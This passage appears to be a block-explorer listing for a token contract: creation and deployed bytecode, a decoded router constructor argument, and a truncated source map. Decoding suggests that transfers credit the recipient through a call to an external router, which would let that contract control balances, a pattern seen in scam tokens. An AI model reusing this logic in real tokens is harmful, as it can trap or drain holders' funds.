180910390f35b60606003805461023590610ec8565b80601f016020809104026020016040519081016040528092919081815260200182805461026190610ec8565b80156102ac5780601f10610283576101008083540402835291602001916102ac565b820191905f5260205f20905b81548152906001019060200180831161028f57829003601f168201915b5050505050905090565b5f806102c0610496565b90506102cd81858561049d565b600191505092915050565b5f600254905090565b5f806102eb610496565b90506102f88582856104af565b610303858585610541565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461036b90610ec8565b80601f016020809104026020016040519081016040528092919081815260200182805461039790610ec8565b80156103e25780601f106103b9576101008083540402835291602001916103e2565b820191905f5260205f20905b8154815290600101906020018083116103c557829003601f168201915b5050505050905090565b5f806103f6610496565b9050610403818585610541565b600191505092915050565b60065481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b6104aa8383836001610631565b505050565b5f6104ba8484610414565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461053b578181101561052c578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161052393929190610f07565b60405180910390fd5b61053a84848484035f610631565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105b1575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016105a89190610f3c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610621575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106189190610f3c565b60405180910390fd5b61062c838383610800565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036106a1575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016106989190610f3c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610711575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107089190610f3c565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156107fa578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516107f19190610d95565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610850578060025f8282546108449190610f82565b9250508190555061091e565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156108d9578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016108d093929190610f07565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610965578060025f8282540392505081905550610b70565b5f6103e8600654836109779190610fb5565b6109819190611023565b90505f600267ffffffffffffffff81111561099f5761099e611053565b5b6040519080825280602002602001820160405280156109cd5781602001602082028036833780820191505090505b50905084815f815181106109e4576109e3611080565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508381600181518110610a3357610a32611080565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16635c11d7958385843361012c42610abc9190610f82565b6040518663ffffffff1660e01b8152600401610adc959493929190611164565b6020604051808303815f875af1158015610af8573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b1c91906111d0565b5f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610b669190610f82565b9250508190555050505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bcd9190610d95565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610c11578082015181840152602081019050610bf6565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610c3682610bda565b610c408185610be4565b9350610c50818560208601610bf4565b610c5981610c1c565b840191505092915050565b5f6020820190508181035f830152610c7c8184610c2c565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cb182610c88565b9050919050565b610cc181610ca7565b8114610ccb575f80fd5b50565b5f81359050610cdc81610cb8565b92915050565b5f819050919050565b610cf481610ce2565b8114610cfe575f80fd5b50565b5f81359050610d0f81610ceb565b92915050565b5f8060408385031215610d2b57610d2a610c84565b5b5f610d3885828601610cce565b9250506020610d4985828601610d01565b9150509250929050565b5f8115159050919050565b610d6781610d53565b82525050565b5f602082019050610d805f830184610d5e565b92915050565b610d8f81610ce2565b82525050565b5f602082019050610da85f830184610d86565b92915050565b5f805f60608486031215610dc557610dc4610c84565b5b5f610dd286828701610cce565b9350506020610de386828701610cce565b9250506040610df486828701610d01565b9150509250925092565b5f60ff82169050919050565b610e1381610dfe565b82525050565b5f602082019050610e2c5f830184610e0a565b92915050565b5f60208284031215610e4757610e46610c84565b5b5f610e5484828501610cce565b91505092915050565b5f8060408385031215610e7357610e72610c84565b5b5f610e8085828601610cce565b9250506020610e9185828601610cce565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610edf57607f821691505b602082108103610ef257610ef1610e9b565b5b50919050565b610f0181610ca7565b82525050565b5f606082019050610f1a5f830186610ef8565b610f276020830185610d86565b610f346040830184610d86565b949350505050565b5f602082019050610f4f5f830184610ef8565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610f8c82610ce2565b9150610f9783610ce2565b9250828201905080821115610faf57610fae610f55565b5b92915050565b5f610fbf82610ce2565b9150610fca83610ce2565b9250828202610fd881610ce2565b91508282048414831517610fef57610fee610f55565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61102d82610ce2565b915061103883610ce2565b92508261104857611047610ff6565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b6110df81610ca7565b82525050565b5f6110f083836110d6565b60208301905092915050565b5f602082019050919050565b5f611112826110ad565b61111c81856110b7565b9350611127836110c7565b805f5b8381101561115757815161113e88826110e5565b9750611149836110fc565b92505060018101905061112a565b5085935050505092915050565b5f60a0820190506111775f830188610d86565b6111846020830187610d86565b81810360408301526111968186611108565b90506111a56060830185610ef8565b6111b26080830184610d86565b9695505050505050565b5f815190506111ca81610ceb565b92915050565b5f602082840312156111e5576111e4610c84565b5b5f6111f2848285016111bc565b9150509291505056fea26469706673582212205262d82d9e0a948c511aa03e494e46bbd82a0423b0525dd8f6e27978770f0a7c64736f6c6343000818003300000000000000000000000000034e8bd509d287692bed5e01012b4559ce6f1a
Deployed Bytecode
0x608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063b2131f7d146101d8578063dd62ed3e146101f65761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610226565b6040516100b59190610c64565b60405180910390f35b6100d860048036038101906100d39190610d15565b6102b6565b6040516100e59190610d6d565b60405180910390f35b6100f66102d8565b6040516101039190610d95565b60405180910390f35b61012660048036038101906101219190610dae565b6102e1565b6040516101339190610d6d565b60405180910390f35b61014461030f565b6040516101519190610e19565b60405180910390f35b610174600480360381019061016f9190610e32565b610317565b6040516101819190610d95565b60405180910390f35b61019261035c565b60405161019f9190610c64565b60405180910390f35b6101c260048036038101906101bd9190610d15565b6103ec565b6040516101cf9190610d6d565b60405180910390f35b6101e061040e565b6040516101ed9190610d95565b60405180910390f35b610210600480360381019061020b9190610e5d565b610414565b60405161021d9190610d95565b60405180910390f35b60606003805461023590610ec8565b80601f016020809104026020016040519081016040528092919081815260200182805461026190610ec8565b80156102ac5780601f10610283576101008083540402835291602001916102ac565b820191905f5260205f20905b81548152906001019060200180831161028f57829003601f168201915b5050505050905090565b5f806102c0610496565b90506102cd81858561049d565b600191505092915050565b5f600254905090565b5f806102eb610496565b90506102f88582856104af565b610303858585610541565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461036b90610ec8565b80601f016020809104026020016040519081016040528092919081815260200182805461039790610ec8565b80156103e25780601f106103b9576101008083540402835291602001916103e2565b820191905f5260205f20905b8154815290600101906020018083116103c557829003601f168201915b5050505050905090565b5f806103f6610496565b9050610403818585610541565b600191505092915050565b60065481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b6104aa8383836001610631565b505050565b5f6104ba8484610414565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461053b578181101561052c578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161052393929190610f07565b60405180910390fd5b61053a84848484035f610631565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105b1575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016105a89190610f3c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610621575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106189190610f3c565b60405180910390fd5b61062c838383610800565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036106a1575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016106989190610f3c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610711575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016107089190610f3c565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156107fa578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516107f19190610d95565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610850578060025f8282546108449190610f82565b9250508190555061091e565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156108d9578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016108d093929190610f07565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610965578060025f8282540392505081905550610b70565b5f6103e8600654836109779190610fb5565b6109819190611023565b90505f600267ffffffffffffffff81111561099f5761099e611053565b5b6040519080825280602002602001820160405280156109cd5781602001602082028036833780820191505090505b50905084815f815181106109e4576109e3611080565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508381600181518110610a3357610a32611080565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16635c11d7958385843361012c42610abc9190610f82565b6040518663ffffffff1660e01b8152600401610adc959493929190611164565b6020604051808303815f875af1158015610af8573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b1c91906111d0565b5f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610b669190610f82565b9250508190555050505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610bcd9190610d95565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610c11578082015181840152602081019050610bf6565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610c3682610bda565b610c408185610be4565b9350610c50818560208601610bf4565b610c5981610c1c565b840191505092915050565b5f6020820190508181035f830152610c7c8184610c2c565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610cb182610c88565b9050919050565b610cc181610ca7565b8114610ccb575f80fd5b50565b5f81359050610cdc81610cb8565b92915050565b5f819050919050565b610cf481610ce2565b8114610cfe575f80fd5b50565b5f81359050610d0f81610ceb565b92915050565b5f8060408385031215610d2b57610d2a610c84565b5b5f610d3885828601610cce565b9250506020610d4985828601610d01565b9150509250929050565b5f8115159050919050565b610d6781610d53565b82525050565b5f602082019050610d805f830184610d5e565b92915050565b610d8f81610ce2565b82525050565b5f602082019050610da85f830184610d86565b92915050565b5f805f60608486031215610dc557610dc4610c84565b5b5f610dd286828701610cce565b9350506020610de386828701610cce565b9250506040610df486828701610d01565b9150509250925092565b5f60ff82169050919050565b610e1381610dfe565b82525050565b5f602082019050610e2c5f830184610e0a565b92915050565b5f60208284031215610e4757610e46610c84565b5b5f610e5484828501610cce565b91505092915050565b5f8060408385031215610e7357610e72610c84565b5b5f610e8085828601610cce565b9250506020610e9185828601610cce565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610edf57607f821691505b602082108103610ef257610ef1610e9b565b5b50919050565b610f0181610ca7565b82525050565b5f606082019050610f1a5f830186610ef8565b610f276020830185610d86565b610f346040830184610d86565b949350505050565b5f602082019050610f4f5f830184610ef8565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610f8c82610ce2565b9150610f9783610ce2565b9250828201905080821115610faf57610fae610f55565b5b92915050565b5f610fbf82610ce2565b9150610fca83610ce2565b9250828202610fd881610ce2565b91508282048414831517610fef57610fee610f55565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61102d82610ce2565b915061103883610ce2565b92508261104857611047610ff6565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b6110df81610ca7565b82525050565b5f6110f083836110d6565b60208301905092915050565b5f602082019050919050565b5f611112826110ad565b61111c81856110b7565b9350611127836110c7565b805f5b8381101561115757815161113e88826110e5565b9750611149836110fc565b92505060018101905061112a565b5085935050505092915050565b5f60a0820190506111775f830188610d86565b6111846020830187610d86565b81810360408301526111968186611108565b90506111a56060830185610ef8565b6111b26080830184610d86565b9695505050505050565b5f815190506111ca81610ceb565b92915050565b5f602082840312156111e5576111e4610c84565b5b5f6111f2848285016111bc565b9150509291505056fea26469706673582212205262d82d9e0a948c511aa03e494e46bbd82a0423b0525dd8f6e27978770f0a7c64736f6c63430008180033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000034e8bd509d287692bed5e01012b4559ce6f1a
-----Decoded View---------------
Arg [0] : router_ (address): 0x00034e8bD509d287692bEd5e01012b4559ce6F1a
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000000034e8bd509d287692bed5e01012b4559ce6f1a
Deployed Bytecode Sourcemap
1050:163:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1916:89:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4135:186;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2986:97;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4913:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2844:82;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3141:116;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2118:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3452:178;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1448:27;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3688:140;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1916:89;1961:13;1993:5;1986:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1916:89;:::o;4135:186::-;4208:4;4224:13;4240:12;:10;:12::i;:::-;4224:28;;4262:31;4271:5;4278:7;4287:5;4262:8;:31::i;:::-;4310:4;4303:11;;;4135:186;;;;:::o;2986:97::-;3038:7;3064:12;;3057:19;;2986:97;:::o;4913:244::-;5000:4;5016:15;5034:12;:10;:12::i;:::-;5016:30;;5056:37;5072:4;5078:7;5087:5;5056:15;:37::i;:::-;5103:26;5113:4;5119:2;5123:5;5103:9;:26::i;:::-;5146:4;5139:11;;;4913:244;;;;;:::o;2844:82::-;2893:5;2917:2;2910:9;;2844:82;:::o;3141:116::-;3206:7;3232:9;:18;3242:7;3232:18;;;;;;;;;;;;;;;;3225:25;;3141:116;;;:::o;2118:93::-;2165:13;2197:7;2190:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2118:93;:::o;3452:178::-;3521:4;3537:13;3553:12;:10;:12::i;:::-;3537:28;;3575:27;3585:5;3592:2;3596:5;3575:9;:27::i;:::-;3619:4;3612:11;;;3452:178;;;;:::o;1448:27::-;;;;:::o;3688:140::-;3768:7;3794:11;:18;3806:5;3794:18;;;;;;;;;;;;;;;:27;3813:7;3794:27;;;;;;;;;;;;;;;;3787:34;;3688:140;;;;:::o;656:96:0:-;709:7;735:10;728:17;;656:96;:::o;9075:128:1:-;9159:37;9168:5;9175:7;9184:5;9191:4;9159:8;:37::i;:::-;9075:128;;;:::o;10764:477::-;10863:24;10890:25;10900:5;10907:7;10890:9;:25::i;:::-;10863:52;;10949:17;10929:16;:37;10925:310;;11005:5;10986:16;:24;10982:130;;;11064:7;11073:16;11091:5;11037:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;10982:130;11153:57;11162:5;11169:7;11197:5;11178:16;:24;11204:5;11153:8;:57::i;:::-;10925:310;10853:388;10764:477;;;:::o;5530:300::-;5629:1;5613:18;;:4;:18;;;5609:86;;5681:1;5654:30;;;;;;;;;;;:::i;:::-;;;;;;;;5609:86;5722:1;5708:16;;:2;:16;;;5704:86;;5776:1;5747:32;;;;;;;;;;;:::i;:::-;;;;;;;;5704:86;5799:24;5807:4;5813:2;5817:5;5799:7;:24::i;:::-;5530:300;;;:::o;10050:432::-;10179:1;10162:19;;:5;:19;;;10158:89;;10233:1;10204:32;;;;;;;;;;;:::i;:::-;;;;;;;;10158:89;10279:1;10260:21;;:7;:21;;;10256:90;;10332:1;10304:31;;;;;;;;;;;:::i;:::-;;;;;;;;10256:90;10385:5;10355:11;:18;10367:5;10355:18;;;;;;;;;;;;;;;:27;10374:7;10355:27;;;;;;;;;;;;;;;:35;;;;10404:9;10400:76;;;10450:7;10434:31;;10443:5;10434:31;;;10459:5;10434:31;;;;;;:::i;:::-;;;;;;;;10400:76;10050:432;;;;:::o;6145:1319::-;6250:1;6234:18;;:4;:18;;;6230:540;;6386:5;6370:12;;:21;;;;;;;:::i;:::-;;;;;;;;6230:540;;;6422:19;6444:9;:15;6454:4;6444:15;;;;;;;;;;;;;;;;6422:37;;6491:5;6477:11;:19;6473:115;;;6548:4;6554:11;6567:5;6523:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;6473:115;6740:5;6726:11;:19;6708:9;:15;6718:4;6708:15;;;;;;;;;;;;;;;:37;;;;6408:362;6230:540;6798:1;6784:16;;:2;:16;;;6780:637;;6963:5;6947:12;;:21;;;;;;;;;;;6780:637;;;7013:11;7046:4;7035:8;;7027:5;:16;;;;:::i;:::-;:23;;;;:::i;:::-;7013:37;;7064:21;7102:1;7088:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7064:40;;7128:4;7118;7123:1;7118:7;;;;;;;;:::i;:::-;;;;;;;:14;;;;;;;;;;;7156:2;7146:4;7151:1;7146:7;;;;;;;;:::i;:::-;;;;;;;:12;;;;;;;;;;;7189:14;;;;;;;;;;;:68;;;7275:3;7296:5;7319:4;7341:10;7388:3;7370:15;:21;;;;:::i;:::-;7189:217;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;7172:9;:13;7182:2;7172:13;;;;;;;;;;;;;;;;:234;;;;;;;:::i;:::-;;;;;;;;6999:418;;6780:637;7447:2;7432:25;;7441:4;7432:25;;;7451:5;7432:25;;;;;;:::i;:::-;;;;;;;;6145:1319;;;:::o;7:99:6:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:474::-;5256:6;5264;5313:2;5301:9;5292:7;5288:23;5284:32;5281:119;;;5319:79;;:::i;:::-;5281:119;5439:1;5464:53;5509:7;5500:6;5489:9;5485:22;5464:53;:::i;:::-;5454:63;;5410:117;5566:2;5592:53;5637:7;5628:6;5617:9;5613:22;5592:53;:::i;:::-;5582:63;;5537:118;5188:474;;;;;:::o;5668:180::-;5716:77;5713:1;5706:88;5813:4;5810:1;5803:15;5837:4;5834:1;5827:15;5854:320;5898:6;5935:1;5929:4;5925:12;5915:22;;5982:1;5976:4;5972:12;6003:18;5993:81;;6059:4;6051:6;6047:17;6037:27;;5993:81;6121:2;6113:6;6110:14;6090:18;6087:38;6084:84;;6140:18;;:::i;:::-;6084:84;5905:269;5854:320;;;:::o;6180:118::-;6267:24;6285:5;6267:24;:::i;:::-;6262:3;6255:37;6180:118;;:::o;6304:442::-;6453:4;6491:2;6480:9;6476:18;6468:26;;6504:71;6572:1;6561:9;6557:17;6548:6;6504:71;:::i;:::-;6585:72;6653:2;6642:9;6638:18;6629:6;6585:72;:::i;:::-;6667;6735:2;6724:9;6720:18;6711:6;6667:72;:::i;:::-;6304:442;;;;;;:::o;6752:222::-;6845:4;6883:2;6872:9;6868:18;6860:26;;6896:71;6964:1;6953:9;6949:17;6940:6;6896:71;:::i;:::-;6752:222;;;;:::o;6980:180::-;7028:77;7025:1;7018:88;7125:4;7122:1;7115:15;7149:4;7146:1;7139:15;7166:191;7206:3;7225:20;7243:1;7225:20;:::i;:::-;7220:25;;7259:20;7277:1;7259:20;:::i;:::-;7254:25;;7302:1;7299;7295:9;7288:16;;7323:3;7320:1;7317:10;7314:36;;;7330:18;;:::i;:::-;7314:36;7166:191;;;;:::o;7363:410::-;7403:7;7426:20;7444:1;7426:20;:::i;:::-;7421:25;;7460:20;7478:1;7460:20;:::i;:::-;7455:25;;7515:1;7512;7508:9;7537:30;7555:11;7537:30;:::i;:::-;7526:41;;7716:1;7707:7;7703:15;7700:1;7697:22;7677:1;7670:9;7650:83;7627:139;;7746:18;;:::i;:::-;7627:139;7411:362;7363:410;;;;:::o;7779:180::-;7827:77;7824:1;7817:88;7924:4;7921:1;7914:15;7948:4;7945:1;7938:15;7965:185;8005:1;8022:20;8040:1;8022:20;:::i;:::-;8017:25;;8056:20;8074:1;8056:20;:::i;:::-;8051:25;;8095:1;8085:35;;8100:18;;:::i;:::-;8085:35;8142:1;8139;8135:9;8130:14;;7965:185;;;;:::o;8156:180::-;8204:77;8201:1;8194:88;8301:4;8298:1;8291:15;8325:4;8322:1;8315:15;8342:180;8390:77;8387:1;8380:88;8487:4;8484:1;8477:15;8511:4;8508:1;8501:15;8528:114;8595:6;8629:5;8623:12;8613:22;;8528:114;;;:::o;8648:184::-;8747:11;8781:6;8776:3;8769:19;8821:4;8816:3;8812:14;8797:29;;8648:184;;;;:::o;8838:132::-;8905:4;8928:3;8920:11;;8958:4;8953:3;8949:14;8941:22;;8838:132;;;:::o;8976:108::-;9053:24;9071:5;9053:24;:::i;:::-;9048:3;9041:37;8976:108;;:::o;9090:179::-;9159:10;9180:46;9222:3;9214:6;9180:46;:::i;:::-;9258:4